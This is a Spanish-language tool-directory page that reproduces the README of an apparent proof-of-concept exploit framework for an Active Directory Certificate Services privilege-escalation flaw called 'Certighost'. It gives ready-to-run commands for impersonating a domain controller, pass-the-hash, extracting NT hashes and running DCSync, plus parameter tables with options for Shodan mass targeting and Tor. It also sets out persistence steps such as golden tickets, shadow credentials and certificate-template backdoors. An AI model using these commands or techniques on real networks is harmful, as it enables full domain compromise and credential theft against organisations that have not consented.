Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-54121-PoC-Exploit — 👻 CVE-2026-54121 - Mejor CertiGhost AD CS Multi-Exploit Framework | Kit avanzado con servidores DC/LDAP falsos, abuso de certificados, extracción de hash PKINIT. Características: detección de comprobación segura, exploit completo multihilo. 🛡️ CVSS 8.8 Alto - Úsalo éticamente, mantente legal. 🔒 | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-54121-poc-exploit
Autenticación y AutorizaciónFrameworks de Pruebas de PenetraciónEscalada de PrivilegiosFrameworks de ExploitsExplotaciónMovimiento LateralPost-ExplotaciónDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
tc4dy/cve-2026-54121-poc-exploit

CVE-2026-54121-PoC-Exploit

Ver Repositorio
276hace 25 díasAún no revisado

Acerca de

👻 CVE-2026-54121 - Mejor CertiGhost AD CS Multi-Exploit Framework | Kit avanzado con servidores DC/LDAP falsos, abuso de certificados, extracción de hash PKINIT. Características: detección de comprobación segura, exploit completo multihilo. 🛡️ CVSS 8.8 Alto - Úsalo éticamente, mantente legal. 🔒

Compartir

CVE-2026-54121

CVE-2026-54121 - AD CS "Certighost" Elevación de Privilegios Framework-Toolkit

CVE-2026-54121 CVSS 8.8 Python 3.6+

Privilege Escalation Identity Impersonation Domain Admin

Active Directory Certificate Services — Certighost → Toma de control del dominio

Marco de explotación y kit de auditoría
Solo para pruebas de seguridad autorizadas.

--- ## ⚖️ Aviso legal y uso responsable **Esta herramienta se proporciona únicamente con fines educativos y de pruebas de penetración autorizadas.** Los autores y colaboradores no son responsables del mal uso o de los daños causados por este software. Los usuarios son los únicos responsables de asegurarse de contar con el permiso escrito explícito del propietario del objetivo antes de realizar las pruebas. El acceso no autorizado a sistemas informáticos es ilegal según las leyes federales, estatales e internacionales de ciberdelincuencia aplicables. Al utilizar este software, usted acepta: - Usarlo únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito de prueba. - Cumplir con todas las leyes locales, estatales y federales aplicables. - No usarlo para actividades maliciosas, destructivas o ilegales. > ⚠️ **ADVERTENCIA:** Las vulnerabilidades de elevación de privilegios en Active Directory presentan un alto riesgo para la infraestructura empresarial. Las pruebas no autorizadas están estrictamente prohibidas. --- ## [+!] Resumen de la vulnerabilidad **CVE-2026-54121** (apodada **"Certighost"**) es una vulnerabilidad de **elevación de privilegios (EoP)** en los Servicios de certificados de Active Directory (AD CS) de Microsoft. Permite que usuarios de dominio con privilegios bajos suplanten cuentas de equipo de controladores de dominio y logren la toma de control total del dominio como administrador de dominio mediante la falsificación de certificados. ### Cómo funciona: 1. **Omisión de validación del destino:** la vulnerabilidad existe debido a comprobaciones de autorización incorrectas (`CWE-285`) en AD CS durante el manejo de los parámetros de destino de las solicitudes de certificado. 2. **Redirección a servidor no autorizado:** la entidad de certificación (CA) acepta destinos de redirección de servidor proporcionados por el cliente sin verificar si el destino es un controlador de dominio autorizado. 3. **Suplantación de controlador de dominio:** la CA consulta el servidor controlado por el atacante y emite un certificado de equipo válido firmado con la identidad de un controlador de dominio privilegiado. 4. **Toma de control del dominio (DCSync):** mediante el certificado de DC falsificado, el atacante se autentica a través de Kerberos/PKINIT para obtener privilegios de controlador de dominio y ejecutar operaciones `DCSync`. ### Datos clave:

¡Advertencia! 🌬️

Este código se ha escrito pensando en un enfoque fácil de usar y es totalmente funcional, priorizando la seguridad, la privacidad y un registro mínimo. Se recomienda eliminar por completo la integración y la librería de Shodan, usar un único hilo en lugar de un grupo de hilos, eliminar el escaneo de puertos y detect_ip, y deshabilitar el registro y la salida. Utilice “stealthcert.py” para esta versión.

CVE-2026-54121 CertiGhost - Referencia de parámetros


📋 Lista completa de parámetros

Parámetros del exploit en Python


stealthcare.py (Explotación segura)


Parámetros del wrapper de PowerShell

🚀 Ejemplos de uso

root@kitploit:~
git clone https://tc4dy/CVE-2026-54121-PoC-Exploit
#install requirements

Ejemplos ❄️

root@kitploit:~
# Auto-discovers CA via LDAP, creates temp computer, spawns rogue servers, requests certificate with cdc redirect, extracts DC's NT hash via PKINIT, enables DCSync for domain takeover
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10

# Impersonates a specific Domain Controller (DC01$). Useful when you know exactly which DC to target. Bypasses auto-discovery
python3 certighost.py -d corp.local -u user -p Passw0rd --dc-ip 10.0.0.1 --target-san DC01$

# Uses NTLM hash instead of password. Works when password is unknown but hash is obtained. ':' before hash = empty LM hash
python3 certighost.py -d domain.local -u admin --hashes :8846f7eaee8fb117ad06bdd830b7586c --dc-ip 192.168.1.10

# Bypasses LDAP CA discovery. Uses explicitly provided CA IP and name. Useful when LDAP is restricted or CA is on different subnet
python3 certighost.py -d playground.local -u lowpriv -p Password123 --dc-ip 192.168.1.10 --ca-ip 192.168.1.20 --ca "PLAYGROUND-CA"

PowerShell (Detección)

root@kitploit:~
# Native LDAP query to check if AD CS is present. Returns CA name and DNS. Read-only, safe for production. No exploitation performed
.\CertiGhost.ps1 -d playground.local --dc-ip 192.168.1.10 --username lowpriv -p Password123 --detect

Backend Python (Exploit)

root@kitploit:~
# Runs native AD CS detection then calls Python certighost.py with all parameters. Requires certighost.py in same directory. Prints NT hash and ccache file
.\CertiGhost.ps1 -d corp.local --dc-ip 10.0.0.1 --username attacker -p P@ssw0rd --exploit --target-account DC01$

Guardar JSON, modo detección

root@kitploit:~
#Detection only mode. Saves results in JSON format. Useful for automation, reporting, and integration with other security tools
.\CertiGhost.ps1 -d domain.local --dc-ip 192.168.1.10 --username user -p pass --detect -o results.json

🧠 Análisis técnico en profundidad

1. Omisión de validación de destino en AD CS (Certighost)

La vulnerabilidad se origina por comprobaciones de autorización y validación incorrectas (CWE-285) en los Servicios de certificados de Active Directory (AD CS) durante los procesos de inscripción de certificados. Un atacante con credenciales de dominio de privilegios bajos puede manipular los parámetros de redirección del destino para engañar a la entidad de certificación (CA) y hacer que verifique aserciones de identidad contra endpoints rogue.

Endpoint / contexto de solicitud vulnerable:

root@kitploit:~
POST /certsrv/mscep/mscep.dll HTTP/1.1
Host: ca-server.domain.local
Content-Type: application/x-www-form-urlencoded

... (Certificate Request payload with manipulated target/cdc parameters)

2. Vectores de ataque

  • Manipulación del objetivo de rastreo (chase target): un atacante modifica los parámetros de redirección del destino (como cdc / chase target) dentro de la solicitud de certificado, forzando a la entidad de certificación (CA) a enrutar el tráfico de verificación hacia un endpoint especificado.

  • Redirección a servidor rogue: la entidad de certificación (CA) inicia conexiones LDAP o SMB hacia el destino proporcionado por el cliente sin validar si el objetivo es un controlador de dominio legítimo y autorizado.

  • Falsificación de identidad de DC y emisión de certificados: el servidor rogue controlado por el atacante responde a las consultas de verificación emitidas por la CA en nombre de la cuenta de controlador de dominio objetivo. Basándose en esta respuesta, la CA emite un certificado válido y firmado que lleva la identidad del controlador de dominio.


3. Post-explotación

Obtención del Ticket Granting Ticket (TGT)

Usando el certificado de controlador de dominio obtenido, se realiza la autenticación Kerberos a través de PKINIT (Public Key Cryptography for Initial Authentication) para recuperar un TGT con privilegios elevados.

Ataque DCSync

Con un ticket Kerberos que posee privilegios de controlador de dominio, se extraen los hashes de contraseña de todas las cuentas de la base de datos de Active Directory (p. ej., krbtgt, Administrator) mediante la técnica DCSync.

Persistencia

  • Creación de Golden Ticket: los TGT se falsifican bajo demanda utilizando el hash de contraseña extraído de la cuenta krbtgt.
  • Credenciales sombra (Shadow Credentials): se añaden claves de certificado no autorizadas al atributo msDS-KeyCredentialLink de las cuentas objetivo para asegurar un acceso persistente.
  • Manipulación de plantillas de certificado: se modifican los permisos de las plantillas de AD CS para mantener configuraciones de puerta trasera que permitan una futura escalada de privilegios.

Movimiento lateral

  • Control total del dominio: se establecen sesiones con privilegios completos (SYSTEM / Domain Admin) en todos los servidores y estaciones de trabajo del dominio.
  • Pivoteo entre bosques (Cross-Forest Pivoting): se logra el acceso a dominios de confianza (Forest Trust) mediante técnicas de SID History o delegación de TGT.

📚 Referencias

  • NVD - CVE-2026-54121
  • Microsoft Security Update Guide - CVE-2026-54121
  • CERT/CC Vulnerability Note
  • MITRE ATT&CK - T1649: Steal or Forge Authentication Certificates

🔗 Otros exploits

  • CVE-2026-15409/15410 - SonicWall SMA1000 Multi-Exploit Framework
  • CVE-2026-6875 - ServiceNow Pre-Auth RCE Exploit Framework
  • CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
  • CVE-2026-57821 - Apache Fineract SQL Injection Toolkit
  • CVE-2026-41940 - cPanel/WHM Authentication Bypass
Descargar herramienta
AtributoValor
📅 Descubierta / CorregidaJulio de 2026 (Microsoft Patch Tuesday)
⚠️ Puntuación CVSS8.8 (ALTA)
🏷️ Nombre en claveCertighost
🎯 Productos afectadosMicrosoft Active Directory Certificate Services
🔄 Versiones corregidasActualización de seguridad de julio de 2026
🔓 AutenticaciónCuenta de dominio con privilegios bajos
🌍 ImpactoCompromiso total del dominio de Active Directory
ParámetroDescripciónEjemplo
-d, --domainNombre DNS del dominio de destino (obligatorio)-d playground.local
-u, --usernameUsuario de dominio con privilegios bajos (obligatorio)-u lowpriv
-p, --passwordContraseña del usuario-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--dc-ipIP del controlador de dominio (obligatorio)--dc-ip 192.168.1.10
--ca-ipIP de la entidad de certificación (opcional)--ca-ip 192.168.1.20
--caNombre de la CA (se detecta automáticamente si no se establece)--ca "PLAYGROUND-CA"
--listenerIP del atacante para servidores rogue--listener 192.168.1.100
--target-sanCuenta de equipo a suplantar (p. ej., DC01$)--target-san DC01$
--templatePlantilla de certificado (predeterminada: Machine)--template Machine
--computer-nameNombre de cuenta de equipo existente (con $)--computer-name GHOSTABCD$
--computer-passContraseña de equipo existente--computer-pass CGabc123...
--computer-hashHash NT de equipo existente--computer-hash 8846f7ea...
--use-ldapUsar LDAP (389) en lugar de LDAPS (636)--use-ldap
--exploitRealizar la explotación--exploit
--detectSolo detección (sin explotación)--detect
-t, --threadsMáximo de hilos para escaneo masivo-t 10
--timeoutTiempo de espera por solicitud (segundos)--timeout 10
--retryNúmero de reintentos en caso de fallo--retry 3
--delayRetardo base entre solicitudes--delay 1.0
--proxyURL del proxy--proxy http://127.0.0.1:8080
--no-verifyDeshabilitar verificación SSL--no-verify
--torUsar proxy Tor (socks5h://127.0.0.1:9050)--tor
-o, --outputArchivo de salida (.json, .csv, .jsonl)-o results.json
-v, --verboseSalida detallada-v
-q, --quietModo silencioso-q
-h, --helpMostrar ayuda-h
ParámetroDescripciónEjemplo
-t, --targetIP u hostname de la CA de destino (obligatorio)-t 192.168.1.20
-d, --domainNombre DNS del dominio de destino (obligatorio)-d playground.local
--dc-ipIP del controlador de dominio (obligatorio)--dc-ip 192.168.1.10
-u, --usernameUsuario de dominio con privilegios bajos (obligatorio)-u lowpriv
-p, --passwordContraseña del usuario-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7eaee8fb117ad06bdd830b7586c
--computer-nameNombre de cuenta de equipo existente (con $)--computer-name GHOSTABCD$
--computer-passContraseña de equipo existente--computer-pass CGabc123...
--computer-hashHash NT de equipo existente--computer-hash 8846f7ea...
--target-accountCuenta a suplantar (p. ej., DC01$)--target-account DC01$
--templatePlantilla de certificado (predeterminada: Machine)--template Machine
--listenerIP del atacante para servidores rogue (detección automática si no se establece)--listener 192.168.1.100
--use-ldapUsar LDAP (389) en lugar de LDAPS (636)--use-ldap
--keep-filesConservar archivos .pfx y .ccache (predeterminado: eliminar)--keep-files
-h, --helpMostrar ayuda-h
ParámetroDescripciónEjemplo
-u, --urlIP u hostname de la CA de destino-u 192.168.1.20
-l, --listArchivo que contiene los objetivos (uno por línea)-l targets.txt
--shodanCargar objetivos desde Shodan--shodan
--shodan-queryConsulta de búsqueda en Shodan--shodan-query "AD CS Certificate"
-d, --domainNombre DNS del dominio de destino (obligatorio)-d playground.local
--dc-ipIP del controlador de dominio (obligatorio)--dc-ip 192.168.1.10
--usernameUsuario de dominio con privilegios bajos (obligatorio)--username lowpriv
-p, --passwordContraseña del usuario-p Password123
-H, --hashesHash NTLM [LM:]NT-H :8846f7ea...
--computer-nameNombre de cuenta de equipo existente (con $)--computer-name GHOSTABCD$
--computer-passContraseña de equipo existente--computer-pass CGabc123...
--computer-hashHash NT de equipo existente--computer-hash 8846f7ea...
--target-accountCuenta a suplantar (p. ej., DC01$)--target-account DC01$
--templatePlantilla de certificado (predeterminada: Machine)--template Machine
--listenerIP del atacante para servidores rogue--listener 192.168.1.100
--use-ldapUsar LDAP (389) en lugar de LDAPS (636)--use-ldap
--exploitRealizar la explotación--exploit
--detectSolo detección (sin explotación)--detect
-t, --threadsMáximo de hilos para escaneo masivo-t 10
--timeoutTiempo de espera por solicitud (segundos)--timeout 10
--retryNúmero de reintentos en caso de fallo--retry 3
--delayRetardo base entre solicitudes--delay 1.0
--proxyURL del proxy--proxy http://127.0.0.1:8080
--no-verifyDeshabilitar verificación SSL--no-verify
--torUsar proxy Tor--tor
-o, --outputArchivo de salida (.json, .csv, .jsonl)-o results.json
-v, --verboseSalida detallada-v
-q, --quietModo silencioso-q
-h, --helpMostrar ayuda-h